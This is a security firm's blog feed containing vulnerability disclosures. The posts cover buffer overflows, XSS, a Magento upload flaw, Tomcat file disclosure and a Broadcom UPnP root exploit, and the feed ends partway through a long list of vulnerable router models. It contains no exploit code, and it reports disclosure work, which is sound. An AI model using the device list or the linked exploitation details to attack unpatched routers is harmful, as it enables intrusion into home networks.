tag:blogger.com,1999:blog-54802387706426226632024-03-18T12:30:02.357-07:00DefenseCodeDefenseCode Security BlogDefenseCodehttp://www.blogger.com/profile/18242007483588528023noreply@blogger.comBlogger24125tag:blogger.com,1999:blog-5480238770642622663.post-25739957837636905292018-04-23T07:03:00.000-07:002018-04-23T07:03:09.781-07:00Application Security Testing (the Wild West perspective)Imagine running a bank in a small town. A small town in the Old Wild West. Gangs roam freely. Many people are poor and desperate. Law and enforcement exists, but is open for individual interpretation. Many crimes go unpunished. And you keep all the bank's money in the safe. Every night you try to sleep and not think about your safe - is someone trying to pry or blow it open at the very moment?<br />
<br />
Now... imagine you want to make that safe more secure. Would you pay a bunch of thugs to crack it open by force and blow it up? Or would you prefer to pay a group of highly skilled engineers to disassemble it to pieces and carefully examine each one and explain how to fix all the weakness they find?<br />
<br />
The Internet of today still functions much as the old Wild West - many laws that try to enforce order are either too broad or vary significantly from country to country. Not many law enforcement officials to be found. And there are a lot of people that roam around trying to gain some profit even if it means breaking the law.<br />
<br />
Your applications and infrastructure is your secure safe. At least it should be secure. You can not be sure unless someone examines it thoroughly and helps you find and fix all the vulnerabilities before the bad guys do. Doing the examination of a running application is called <a href="http://defensecode.com/webscanner.php">DAST (Dynamic Application Security Testing)</a>. DAST is the equivalent of roughly shaking the safe, beating it with a large club, proceeding to cut it with a blowtorch, and finishing up with a bunch of explosives. It has it's own purpose and advantages, but will never be able to discover some of the weaknesses the careful disassembly and examination would. To check your applications in a thorough way you need to analyze it's source code. The best method to do it is called <a href="http://defensecode.com/thunderscan.php">SAST (Static Application Security Testing)</a>.<br />
<br />
To perform the static testing, you can employ two methods:<br />
<br />
<ol>
<li>Team(s) of highly skilled security professionals going through your source code line by line and trying to spot weaknesses</li>
<li>Find some way to automate the procedure and have people only examine and verify the results</li>
</ol>
<br />
<br />
The first method (manual code review) gives best results if the team is skilled enough and has enough time to do it. Experienced security professionals are hard to find (read: not cheap) and time it takes to manually go through even medium application can take the whole team of people many months or years. Because of huge costs and time it takes, manual code review is seldom employed for anything but the applications of utmost importance.<br />
<br />
Way to go is to automate the procedure and employ the help of your own computer to read and understand the source code. And notify you if there are any security vulnerabilities in there. That way you can check your code while still in early stages of development and spot the issues early enough. And avoid the costs of having to do a major redesign later on. If using automated tools, you can make a policy that says: "Every new version of the application that goes into production must go through the security review". That way you can sleep peacefully knowing that the latest deploy did not just open up a huge hole right in the middle of your application. A hole that you might hear about in the morning news while sipping your coffee. Might not be the way you want to make a debut for yourself and your company.<br />
<br />
The question remains - if the source code review is so costly and time consuming, how can anyone afford doing it even once, let alone do regular checks every time something is changed or added? There are not many solutions and tools that help you, but we can assure you ours is one of the best there is. We call it <a href="http://defensecode.com/thunderscan.php">ThunderScan</a>. Almost 10 years in development, it grew to become one of the best and cost effective tools out there. Maybe even the best - we will let you decide.<br />
<br />
We tried to find a way to compare it to the best tools there are. The most objective and acclaimed way to do it was to apply for the <a href="https://www.owasp.org/index.php/Benchmark">OWASP Benchmark Project</a>. The OWASP Foundation one of the top authorities in IT security. Their Benchmark allowed us to examine the score of our SAST tool (<a href="http://defensecode.com/thunderscan.php">ThunderScan</a>) to the best tools in the world. And our results were impressive - we managed to find <a href="http://defensecode.com/news_article.php?id=29">way more vulnerabilities than any other commercial tool</a>.<br />
<br />
We encourage you to try our tool yourself and make your own opinion. You can grab a free trial by clicking <a href="https://www.defensecode.com/contact.php?subject=3&item=ThunderScan">HERE</a>. No credit card required. Really free of charge. Let us know how you like it by contacting us at <a href="mailto:defensecode@defensecode.com">defensecode@defensecode.com</a><br />
<br />
Kind regards,<br />
<br />
DefenseCode team<br />
<br />
P.S.<br />
We mentioned we also excel in the cost-performance. Well... That was not the whole truth. Although we do offer highest quality we do not charge highest prices. On the contrary - our prices are only a fraction of prices of the other top of the line tools, and we are so proud of it we made them public. You can check them out <a href="https://www.defensecode.com/pricing-products.php#thunder">HERE</a><br />
<div>
<br /></div>
Anonymousnoreply@blogger.com438tag:blogger.com,1999:blog-5480238770642622663.post-22828330073107512002017-07-11T07:55:00.000-07:002017-07-11T07:56:28.885-07:00Multiple Buffer Overflow Vulnerabilities in IBM Database software (DB2 and Informix)Hi Dear Reader,<br />
<br />
During the last couple of weeks we have published security vulnerabilities in database tools related to DB2 and Informix databases.<br />
We're sure that you (as responsible database admin) usually don't run arbitrary "attacker supplied" .SQL files on your database.<br />
But even more, after security audit results of Informix and DB2 database tools, we're sure that you want to add extra care on that one, since we've discovered that poisonous .SQL files can overflow database tools memory buffers and execute arbitrary code on your system.<br />
<br />
Links to our advisories follows...<br />
<br />
Informix Security Advisory:<br />
<a href="http://www.defensecode.com/advisories/DC-2017-04-001_IBM_Informix_DB-Access_Buffer_Overflow.pdf">http://www.defensecode.com/advisories/DC-2017-04-001_IBM_Informix_DB-Access_Buffer_Overflow.pdf</a><br />
<br />
DB2 Security Advisory:<br />
<a href="http://www.defensecode.com/advisories/IBM_DB2_Command_Line_Processor_Buffer_Overflow.pdf">http://www.defensecode.com/advisories/IBM_DB2_Command_Line_Processor_Buffer_Overflow.pdf</a><br />
<br />
Kind Regards,<br />
DefenseCode TeamDefenseCodehttp://www.blogger.com/profile/18242007483588528023noreply@blogger.com161tag:blogger.com,1999:blog-5480238770642622663.post-84088359112431401672017-06-06T04:37:00.000-07:002017-06-06T04:37:20.646-07:00ThunderScan Discovered Multiple Vulnerabilities in Google API Client Library for PHPHi,<br />
<br />
During the security audit of Google APIs Client Library for PHP multiple XSS vulnerabilities were discovered using DefenseCode ThunderScan SAST application source code security analysis platform. The Google API Client Library for PHP is designed for PHP client-application developers. It offers simple, flexible, powerful access to many Google APIs such as Google+, Drive, or YouTube.<br />
<br />
The Cross-Site Scripting vulnerability can enable the attacker to construct the URL that contains malicious JavaScript code. If the administrator of the site makes a request to such an URL, the attacker's code will be executed, with unrestricted access to the site in question. The attacker can entice the administrator to visit the URL in various ways, including sending the URL by email, posting it as a part of the comment on the vulnerable site or another forum. Once the unsuspecting user has visited such an URL, the attacker can proceed to send requests to the API on the behalf of the victim from his JavaScript.<br />
<br />
Full advisory can be read on the following URL: <a href="http://www.defensecode.com/advisories/DC-2017-04-012_google-api-php-client_Advisory.pdf">http://www.defensecode.com/advisories/DC-2017-04-012_google-api-php-client_Advisory.pdf</a><br />
<br />
Regards,<br />
DefenseCode TeamDefenseCodehttp://www.blogger.com/profile/18242007483588528023noreply@blogger.com166tag:blogger.com,1999:blog-5480238770642622663.post-16587608586427569442017-06-06T04:34:00.003-07:002017-06-06T04:34:22.365-07:00DefenseCode Is Looking for New Partners and ResellersIn order to additionally expand its rapid growth, DefenseCode L.L.C is currently looking to expand our world-wide partners and resellers for our software products and services. If you are interested in partnership with DefenseCode L.L.C for distribution of world's top class security solutions for Web Security Scanning and Static Source Code Security Analysis, as well as our security consulting services, we would be glad to hear from you.<br />
<br />
Potential partners and resellers are encouraged to contact us over the e-mail <b>partners@defensecode.com</b>. We are looking forward to our new partners and more exciting business opportunities.<br />
<br />
Regards,<br />
DefenseCode TeamDefenseCodehttp://www.blogger.com/profile/18242007483588528023noreply@blogger.com144tag:blogger.com,1999:blog-5480238770642622663.post-45701349325284139302017-06-06T04:31:00.001-07:002017-06-06T04:31:49.997-07:00Stealing Windows Credentials Using Google ChromeHi,<br />
<br />
Check out our new whitepaper about stealing Windows credentials using the most popular browser today - Google Chrome.<br />
<br />
URL:<br />
<a href="http://www.defensecode.com/news_article.php?id=21">http://www.defensecode.com/news_article.php?id=21</a><br />
<br />
<br />
Regards,<br />
DefenseCode TeamDefenseCodehttp://www.blogger.com/profile/18242007483588528023noreply@blogger.com135tag:blogger.com,1999:blog-5480238770642622663.post-8102588217044505952017-04-12T13:58:00.003-07:002017-04-12T14:00:35.804-07:00High Risk 0-day Vulnerability Found in Magento eCommerce<div class="body">
During the security audit of Magento Community Edition, a highly
popular e-commerce platform, a high risk vulnerability was discovered
that could lead to remote code execution and thus the complete system
compromise including the database containing sensitive customer
information such as stored credit card numbers and other payment
information. The vulnerability is based around an arbitrary file upload
combined with a cross-site request forgery (CSRF) vulnerability as a
main attack vector.<br />
<br />
Despite the efforts of our team in notifying the vendor on more than
one occasion since November 2016, the vulnerability remains unpatched.<br />
<br />
Full vulnerability details are published as an <a href="http://www.defensecode.com/advisories/DC-2017-04-003_Magento_Arbitrary_File_Upload.pdf">advisory</a>.<br />
<br />
Regards,<br />
DefenseCode Team</div>
Boskohttp://www.blogger.com/profile/09407315927818006599noreply@blogger.com252tag:blogger.com,1999:blog-5480238770642622663.post-76337868233866015762017-04-10T11:37:00.001-07:002017-04-10T11:38:43.267-07:00Apache Tomcat Vulnerabilities Found Using DefenseCode ThunderScan SAST<div style="background-color: white; border: 0px; box-sizing: border-box; color: #2b5173; font-family: robotolight, sans-serif; font-size: 18px; font-stretch: inherit; font-variant-numeric: inherit; line-height: 24px; margin-bottom: 10px; margin-top: 20px; padding: 0px; vertical-align: baseline;">
During the source code security analysis of <a href="https://en.wikipedia.org/wiki/Apache_Tomcat" style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">Apache Tomcat</a> with <a href="http://defensecode.com/thunderscan.php" style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">DefenseCode ThunderScan</a> SAST solution, two different security issues were discovered, ranked as medium risk.<br />
When exploited, discovered vulnerabilities can be abused to disclose and retrieve arbitrary files on server, such as Apache Tomcat configuration file with plain text usernames and passwords or any other file which Apache Tomcat has permission to access.</div>
<div style="background-color: white; border: 0px; box-sizing: border-box; color: #2b5173; font-family: robotolight, sans-serif; font-size: 18px; font-stretch: inherit; font-variant-numeric: inherit; line-height: 24px; margin-bottom: 10px; margin-top: 20px; padding: 0px; vertical-align: baseline;">
Full vulnerability details are published as an <a href="http://defensecode.com/advisories/DC-2017-03-001_DefenseCode_ThunderScan_SAST_Apache_Tomcat_Security_Advisory.pdf" style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">advisory</a> and include ThunderScan screenshots for better understanding of the vulnerability.</div>
<div style="background-color: white; border: 0px; box-sizing: border-box; color: #2b5173; font-family: robotolight, sans-serif; font-size: 18px; font-stretch: inherit; font-variant-numeric: inherit; line-height: 24px; margin-bottom: 10px; margin-top: 20px; padding: 0px; vertical-align: baseline;">
Regards,</div>
<div style="background-color: white; border: 0px; box-sizing: border-box; color: #2b5173; font-family: robotolight, sans-serif; font-size: 18px; font-stretch: inherit; font-variant-numeric: inherit; line-height: 24px; margin-bottom: 10px; margin-top: 20px; padding: 0px; vertical-align: baseline;">
DefenseCode Team</div>
DefenseCodehttp://www.blogger.com/profile/18242007483588528023noreply@blogger.com228tag:blogger.com,1999:blog-5480238770642622663.post-70074819747124953032017-04-06T09:26:00.003-07:002017-04-06T09:26:59.716-07:00BroadCom UPnP Format String Preauth Root Exploit Aftermath (Few Years Later)<pre wrap="">Hi,
Few years ago, we have discovered a remotely exploitable preauth Format
String vulnerability in Broadcom UPnP implementation used in popular
routers.
Vendors were notified and advisory was published -
<a class="moz-txt-link-freetext" href="http://defensecode.com/public/DefenseCode_Broadcom_Security_Advisory.pdf">http://defensecode.com/public/DefenseCode_Broadcom_Security_Advisory.pdf</a> .
Broadcom fixed the vulnerability in their UPnP implementation and some
router vendors did it also.
Vulnerability was initially discovered on Cisco Linksys (now Belkin)
WRT54GL routers, but as stated before, vulnerable UPnP implementation
was used by many vendors.
Back in the days, Cisco fixed the vulnerability, but we are not sure
about all other router vendors and models because there are too many of
them.
When we initially discovered the vulnerability, Rapid7 also discovered
various overflows in other popular UPnP implementations, and published a
paper about it.
Rapid7 document about vulnerabilities they discovered in UPnP
implementations: <a class="moz-txt-link-freetext" href="https://community.rapid7.com/docs/DOC-2150">https://community.rapid7.com/docs/DOC-2150</a>
When they did the research, there were approx. 15 Million devices with
vulnerable Broadcom UPnP implementation discovered on the Internet,
probably many more in the Intranets.
We have written a paper about detailed exploitation steps for now fixed
Broadcom UPnP Format String vulnerability, but never published it due to
the severity of the bug.
Now, few years later, we feel comfortable to release a full research
paper with vulnerability details and exploitation steps for discovered
Format String vulnerability.
Big issue with routers is that they are rarely updated by users with new
firmware and there could be still a lot of vulnerable routers on the
Internet and in the Intranets.
Full research paper on discovery and exploitation of the Broadcom UPnP
Format String vulnerability can be found on the following link:
<a class="moz-txt-link-freetext" href="http://www.defensecode.com/whitepapers/From_Zero_To_ZeroDay_Network_Devices_Exploitation.txt">http://www.defensecode.com/whitepapers/From_Zero_To_ZeroDay_Network_Devices_Exploitation.txt</a>
Since Broadcom and vendors that use their chipsets ship fixed versions of the UPnP implementation for some time now, the vulnerability isn't a 0day for some time.
Still, we are sure there are plenty unpatched routers out there.
</pre>
<pre wrap="">Regards,</pre>
<pre wrap="">DefenseCode Team</pre>
DefenseCodehttp://www.blogger.com/profile/18242007483588528023noreply@blogger.com285tag:blogger.com,1999:blog-5480238770642622663.post-31213414500573997702017-03-21T10:55:00.002-07:002017-03-21T10:55:30.678-07:00Brand New ThunderScan and Web Security ScannerHello,<br />
<br />
It's been a while since our last post.<br />
We have been working hard on improving our flagship products - ThunderScan Source Code Security Analyzer SAST and Web Security Scanner DAST solution.<br />
We are pleased to say that there are brand new versions of both product ready for use.<br />
Check out for more details on our website <a href="http://www.defensecode.com/">http://www.defensecode.com/</a>.<br />
<br />
Regards,<br />
Leon JuranicDefenseCodehttp://www.blogger.com/profile/18242007483588528023noreply@blogger.com142tag:blogger.com,1999:blog-5480238770642622663.post-85515293483320719032014-06-25T02:33:00.001-07:002014-06-25T02:49:38.149-07:00Back To The Future: Unix Wildcards Gone WildHi,<br />
<br />
We wanted to inform all major *nix distributions via our responsible<br />
disclosure policy about this problem before posting it, because it is<br />
highly likely that this problem could lead to local root access on many<br />
distributions. But, since part of this research contained in the document<br />
was mentioned on some blog entries, we are forced to release it in a<br />
full version.<br />
<div>
<br /></div>
<div>
<br /></div>
<div>
Download URL:</div>
<a href="http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt">http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt</a><br />
<br />
Regards,<br />
Leon Juranic<br />
<div>
<br /></div>
DefenseCodehttp://www.blogger.com/profile/18242007483588528023noreply@blogger.com555tag:blogger.com,1999:blog-5480238770642622663.post-76082181878784681542013-02-06T18:32:00.002-08:002013-02-06T18:38:19.941-08:00First public patch for Broadcom UPnP vulnerabilityFirst public patch for Broadcom UPnP vulnerability from TP-Link.<br />
<br />
From: <a href="http://forum.tp-link.com/showthread.php?2252-Fixed-a-critical-vulnerability-issue-related-to-UPnP">http://forum.tp-link.com/showthread.php?2252-Fixed-a-critical-vulnerability-issue-related-to-UPnP</a><br />
<br />
<blockquote class="tr_bq">
Fixed a critical vulnerability issue related to UPnP<br />Model : TD-W8960N<br />Hardware Version : V4<br />Following the release this week of a research paper from security firm<br />Rapid7 describing vulnerabilities in the widely used Intel/Portable UPnP SDK and MiniUPnP SDK stacks, security researchers from DefenseCode announced that they identified a critical vulnerability in a separate UPnP stack developed by Broadcom and used in devices with Broadcom chipsets, including one device from TP-LINK, the TD-W8960N.<br />http://www.defensecode.com/public/De...y_Advisory.pdf<br />Being aware of the urgency of this issue, our R&D solved it immediately and released a beta Firmware for the customers who are worried about this problem to download.<br />You can find this beta Firmware here:<br />http://www.tp-link.com/en/support/do...rsion=V4#tbl_j<br />At the end of February, we will release the official FW, solving the UPnP Vulnerability of TD-W8960N.</blockquote>
<br />
<br />
Regards,<br />
DefenseCodeDefenseCodehttp://www.blogger.com/profile/18242007483588528023noreply@blogger.com109tag:blogger.com,1999:blog-5480238770642622663.post-17453259940908953232013-02-06T08:01:00.005-08:002013-02-06T08:01:38.033-08:00DefenseCode Security Advisory: Cisco Linksys Remote Preauth 0day Root Exploit Follow-Up<br />
<br />
A few weeks ago, we have announced remote preauth root access exploit for<br />
Cisco Linksys (<a href="http://www.youtube.com/watch?v=cv-MbL7KFKE">http://www.youtube.com/watch?v=cv-MbL7KFKE</a>).<br />
<br />
Vulnerability details were disclosed here:<br />
<a href="http://www.defensecode.com/public/DefenseCode_Broadcom_Security_Advisory.pdf">http://www.defensecode.com/public/DefenseCode_Broadcom_Security_Advisory.pdf</a><br />
<br />
During further research, we have discovered that other router<br />
manufacturers are also vulnerable to the same vulnerability, since<br />
vulnerable Broadcom UPnP stack is used across multiple router vendors.<br />
<br />
According to data from Rapid7, from 80 million routers discovered<br />
during data gathering on the internet, ~15 million had Broadcom UPnP.<br />
More info available here:<br />
<a href="http://information.rapid7.com/upnp-webcast-video-page.html">http://information.rapid7.com/upnp-webcast-video-page.html</a><br />
<br />
Below is the partial list of other vulnerable router manufacturers and<br />
models. Thanks to HD Moore of Rapid7 for data.<br />
<br />
Regards,<br />
Leon Juranic<br />
CEO<br />
DefenseCode<br />
http://www.defensecode.com/<br />
<br />
<br />
<br />
3Com<br />
<br />
- ADSL Wireless Router<br />
<br />
- Broadcom ADSL Router<br />
<br />
- Internet Gateway Device<br />
<br />
<br />
<br />
Actiontec<br />
<br />
- GT784WN<br />
<br />
- xDSL Router<br />
<br />
- Broadcom ADSL Router<br />
<br />
- DSL Modem implementing Qwest TR-064 v1.0 specification<br />
<br />
- DSL Modem implementing TR-064 v1.0 specification<br />
<br />
<br />
<br />
Actiontec Electronics<br />
<br />
- Actiontec xDSL Router<br />
<br />
- Verizon ADSL Router<br />
<br />
<br />
<br />
ADBB<br />
<br />
- DSL Router<br />
<br />
<br />
<br />
ADB Broadband<br />
<br />
- ADB ADSL Router<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
ADB Broadband S.p.A.<br />
<br />
- ADB ADSL Router<br />
<br />
<br />
<br />
ADB Broadband S.p.A<br />
<br />
- HomeStation ADSL Router<br />
<br />
<br />
<br />
<br />
ADSL2+ Router <br />
<br />
- ADSL2/2+ Modem Router<br />
<br />
- ADSLRouter<br />
<br />
<br />
<br />
ALBIS<br />
<br />
- Router VLR-4300-I<br />
<br />
<br />
<br />
Allied Telesis K.K.<br />
<br />
- CG-BARFX3<br />
<br />
<br />
<br />
Alpha<br />
<br />
- ADSL Router<br />
<br />
- DLink ADSL Router<br />
<br />
- Sky ADSL Router<br />
<br />
<br />
<br />
Alvarion<br />
<br />
- Residential Gateway<br />
<br />
<br />
<br />
ASB<br />
<br />
- ADSL Router<br />
<br />
- Alcatel-EG692HW Internet Sharing Gateway<br />
<br />
- ChinaTelecom E8C(EPON) Gateway<br />
<br />
- Home Gateway<br />
<br />
<br />
<br />
Askey<br />
<br />
- ADSL2+ Router<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
Askey Computer Corp.<br />
<br />
- Wireless ADSL2+ Router<br />
<br />
<br />
<br />
ASUS<br />
<br />
- Wireless Router<br />
<br />
<br />
<br />
ASUSTek<br />
<br />
- ASUS ADSL Router<br />
<br />
- ASUS Wireless Harddisk Drive<br />
<br />
- ASUS Wireless Router<br />
<br />
<br />
<br />
ASUSTek Computer Inc.<br />
<br />
- ASUS Wireless Router<br />
<br />
- Residential Gateway Device<br />
<br />
- WL-500gPV2<br />
<br />
- WL-500gP V2<br />
<br />
- WL-520GU<br />
<br />
- WL700gE<br />
<br />
<br />
<br />
BEC_8800N<br />
<br />
- BEC 8800N<br />
<br />
<br />
<br />
BEC Technologies Inc.<br />
<br />
- BEC 7800TN R2<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
Belkin<br />
<br />
- ADSL Router<br />
<br />
- F5D8232-4 v1000<br />
<br />
- N1 ADSL Router<br />
<br />
- Wireless ADSL Router<br />
<br />
- BoB<br />
<br />
- iiNet BoB<br />
<br />
- Wireless ADSL Router<br />
<br />
<br />
<br />
Bellmann<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
Billion<br />
<br />
- BiPAC 7700N<br />
<br />
- BiPAC 7700N R2<br />
<br />
<br />
<br />
Billion Electric Co., Ltd.<br />
<br />
- ADSL2+ Firewall Router<br />
<br />
- BiPAC 7800VDOX<br />
<br />
- BiPAC 7800VDPX<br />
<br />
- home.gateway<br />
<br />
<br />
<br />
Billion Electric Co.,Ltd.<br />
<br />
- home.gateway<br />
<br />
<br />
<br />
Billion Electric Co, PC Range Pty Ltd.<br />
<br />
- home.gateway<br />
<br />
<br />
<br />
BM<br />
<br />
- ChinaTelecom E8C(EPON) Gateway<br />
<br />
<br />
<br />
Broadcom<br />
<br />
- 3G Router<br />
<br />
- Actiontec GT784WN<br />
<br />
- Actiontec xDSL Router<br />
<br />
- ADSL2+ 11n WiFi CPE<br />
<br />
- ADSL2/2+ Modem Router<br />
<br />
- ADSL Router<br />
<br />
- ADSL Router<br />
<br />
- ChinaTelecom E8 ADSL Router<br />
<br />
- D-link ADSL Router<br />
<br />
- D-Link ADSL Router<br />
<br />
- DLink ADSL Router<br />
<br />
- D-Link DSL-2640B<br />
<br />
- D-Link DSL-2641B<br />
<br />
- D-Link DSL-500B<br />
<br />
- DSL2740B ADSL Router<br />
<br />
- DSL Router<br />
<br />
- HomeStation ADSL Router<br />
<br />
- PHILEAS-WORLD<br />
<br />
- PTCL ADSL Router<br />
<br />
- Residential Gateway Device<br />
<br />
- SemIndia Systems ADSL2Plus Router<br />
<br />
- STOREX<br />
<br />
- WL700g<br />
<br />
- Zoom ADSL Router<br />
<br />
<br />
<br />
BT<br />
<br />
- Voyager 2091<br />
<br />
- Voyager 220V<br />
<br />
- Voyager 2091<br />
<br />
- Voyager 2110<br />
<br />
- Voyager 220V<br />
<br />
- Voyager 2500V<br />
<br />
<br />
<br />
Careca<br />
<br />
- HRDSL108W 108M Wireless ADSL2+ router<br />
<br />
<br />
<br />
CATCH-TEC<br />
<br />
- ADSL2/2+ Modem Router<br />
<br />
<br />
<br />
CDC POINT S.P.A<br />
<br />
- ADSL2/2+ Modem Router<br />
<br />
<br />
<br />
ChinaTelecom<br />
<br />
- ASB Home Gateway<br />
<br />
<br />
<br />
China Telecom<br />
<br />
- ChinaNet EPON Router<br />
<br />
- E8C(EPON) Gateway<br />
<br />
- E8C Gateway<br />
<br />
- Navigator 1-2 Gateway<br />
<br />
<br />
<br />
Cisco Systems,Inc.<br />
<br />
- Cisco ADSL Router<br />
<br />
<br />
<br />
ClearAccess<br />
<br />
- Broadcom ADSL Router<br />
<br />
- D-Link DSL-2730B<br />
<br />
<br />
<br />
Comtrend<br />
<br />
- AR-5383n<br />
<br />
- Broadcom ADSL Router<br />
<br />
- single-chip ADSL router<br />
<br />
- WAP-5850g<br />
<br />
- Netcomm ADSL2+/3G Wi-Fi Router<br />
<br />
<br />
<br />
Corega<br />
<br />
- CG-BARMX2<br />
<br />
- CG-WLBARAGM<br />
<br />
<br />
<br />
Danalink<br />
<br />
- Dynalink ADSL Router<br />
<br />
- Dynalink Wireless ADSL2+ Router<br />
<br />
<br />
<br />
DARE<br />
<br />
- DareGlobal Home Gateway<br />
<br />
<br />
<br />
Dare<br />
<br />
- Router<br />
<br />
<br />
<br />
Dare Inc.<br />
<br />
- Dare ADSL2+ Modem/Wireless Router<br />
<br />
<br />
<br />
DCOM<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
DGT<br />
<br />
- VDSL Router<br />
<br />
<br />
<br />
Digicom<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
Digital Data Communications, Inc<br />
<br />
- FBR-1461A ADSL2+ Modem Router(X.X.X.X)<br />
<br />
- FBR-1461 ADSL2+ Modem Router (X.X.X.X)<br />
<br />
<br />
<br />
DIGITUS<br />
<br />
- Internet Gateway Device<br />
<br />
<br />
<br />
DIT<br />
<br />
- Gateway<br />
<br />
<br />
<br />
D-Link<br />
<br />
- ADSL MODEM<br />
<br />
<br />
<br />
D-link<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
D-LINK<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
DLink<br />
<br />
- Alpha ADSL Router<br />
<br />
<br />
<br />
D-Link Corporation.<br />
<br />
- D-Link D-LinkDSL-2640B<br />
<br />
- D-Link DSL-2640B<br />
<br />
- D-LinkDSL-2640B<br />
<br />
- D-LinkDSL-2641B<br />
<br />
- D-Link DSL-2740B<br />
<br />
- D-LinkDSL-2740B<br />
<br />
- D-Link DSL-2740U<br />
<br />
- D-Link DSL-2741B<br />
<br />
- D-LinkDSL-2741B<br />
<br />
- D-Link DSL-2750B<br />
<br />
- D-LinkDSL-2750B<br />
<br />
<br />
<br />
D-Link Corporation<br />
<br />
- D-Link DSL6740U<br />
<br />
- DSL-2640B<br />
<br />
- DSL2740B<br />
<br />
- DSL-2740B<br />
<br />
- DSL-2740B Adsl Router<br />
<br />
- DSL-2740B Adsl Router<br />
<br />
- DSL-2740U Adsl Router<br />
<br />
- DSL-2741B<br />
<br />
- DSL-2741B Adsl Router<br />
<br />
- DSL2750B<br />
<br />
- DVA-G3670B Adsl Router<br />
<br />
<br />
<br />
Dlink<br />
<br />
- ADSL router<br />
<br />
- ADSL Router<br />
<br />
- D-Link ADSL Router<br />
<br />
- ADSL Router<br />
<br />
- DLink ADSL Router<br />
<br />
- ADSL Router<br />
<br />
- DSL-2500U<br />
<br />
- DSL-2542B<br />
<br />
- DSL-2640B<br />
<br />
- DSL-2640U<br />
<br />
- DSL-2730B<br />
<br />
- D-Link DSL-2730B<br />
<br />
- DSL2730U<br />
<br />
- DSL-2730U<br />
<br />
- DSL-2740EL<br />
<br />
- DSL2750U<br />
<br />
- DSL-2750U<br />
<br />
- D-Link DSL-526B<br />
<br />
- DSL-526B<br />
<br />
- Router<br />
<br />
- D-Link VDSL Router<br />
<br />
- Wireless Router<br />
<br />
- DSL-2542B<br />
<br />
- DSL-2640B<br />
<br />
- DSL-2640BT<br />
<br />
- DSL-2640U<br />
<br />
- DSL-2740B<br />
<br />
- DSL-526B<br />
<br />
- DSL-526B<br />
<br />
- DSL-526B<br />
<br />
- DVA-G3672B-LTT Networks ADSL Router<br />
<br />
- DVA-G3672B Networks ADSL Router<br />
<br />
<br />
<br />
DQ<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
DQ Technology, Inc.<br />
<br />
- ADSL2+ 11n WiFi CPE<br />
<br />
- ADSL2+ CPE<br />
<br />
- DSL-2542BNetworksADSLRouter<br />
<br />
- DSL-2642BNetworksADSLRouter<br />
<br />
- DSL-2730BNetworksADSLRouter<br />
<br />
- DSL-2730UNetworksADSLRouter<br />
<br />
<br />
<br />
DSL<br />
<br />
- ARouter<br />
<br />
- DSLRouter<br />
<br />
- TW ARouter<br />
<br />
<br />
<br />
Dynalink<br />
<br />
- ADSL2+ Router<br />
<br />
- ADSL2+ Wireless Modem Router<br />
<br />
- Wireless ADSL2+ Router<br />
<br />
<br />
<br />
ENKOM<br />
<br />
- AMIS Router<br />
<br />
<br />
<br />
FAMNET<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
FiberHome<br />
<br />
- ADSL Router<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
Glitel<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
gmesh<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
huaqin<br />
<br />
- HGU421 Router<br />
<br />
- HGU421 v3 Router<br />
<br />
<br />
<br />
Huawei-3Com<br />
<br />
- BR204+<br />
<br />
<br />
<br />
Huawei<br />
<br />
- Echolife ADSL Router<br />
<br />
- EchoLife Home Gateway<br />
<br />
- HG227<br />
<br />
- ADSL Router<br />
<br />
- Residential Gateway Device<br />
<br />
<br />
<br />
Huawei Technologies Co., Ltd<br />
<br />
- EchoLife HG520<br />
<br />
<br />
<br />
iBall Baton<br />
<br />
- 150M Wireless-N ADSL2+ Router<br />
<br />
<br />
<br />
iiNet<br />
<br />
- BoB2<br />
<br />
- BoBLite<br />
<br />
<br />
<br />
Innoband<br />
<br />
- DSL Router<br />
<br />
<br />
<br />
Inteno<br />
<br />
- Broadcom ADSL Router<br />
<br />
- DSL Router<br />
<br />
- Residential Gateway<br />
<br />
<br />
<br />
Intercross<br />
<br />
- Broadcom ADSL Router<br />
<br />
- InternetGatewayDevice<br />
<br />
<br />
<br />
IskraTEL<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
ITI Ltd.<br />
<br />
- ITI ADSL2+ Modem/Wireless Router<br />
<br />
- ITI Ltd.ADSL2Plus Modem/Router<br />
<br />
<br />
<br />
K?NIG<br />
<br />
- ADSL2/2+ Modem Router<br />
<br />
- ADSL2/2+ Modem Router<br />
<br />
<br />
<br />
Kunhar Peripherals Pvt Ltd<br />
<br />
- 54M Wireless ADSL2+ router<br />
<br />
<br />
<br />
LevelOne<br />
<br />
- FBR-1461B<br />
<br />
<br />
<br />
Linksys by Cisco<br />
<br />
- Linksys WRT54G<br />
<br />
- Linksys WRT54GL<br />
<br />
<br />
<br />
Linksys Inc.<br />
<br />
- DD-WRT Router (X.X.X.X)<br />
<br />
- Linksys MA568243<br />
<br />
- Linksys ma890673<br />
<br />
- Linksys WRT150N<br />
<br />
- Linksys WRT54GL<br />
<br />
- Linksys WRT54GS-PC<br />
<br />
- Linksys wrt54gs v4<br />
<br />
- Linksys WRT54GS (X.X.X.X)<br />
<br />
- Residential Gateway Device<br />
<br />
<br />
<br />
Linksys<br />
<br />
- Internet Gateway Device<br />
<br />
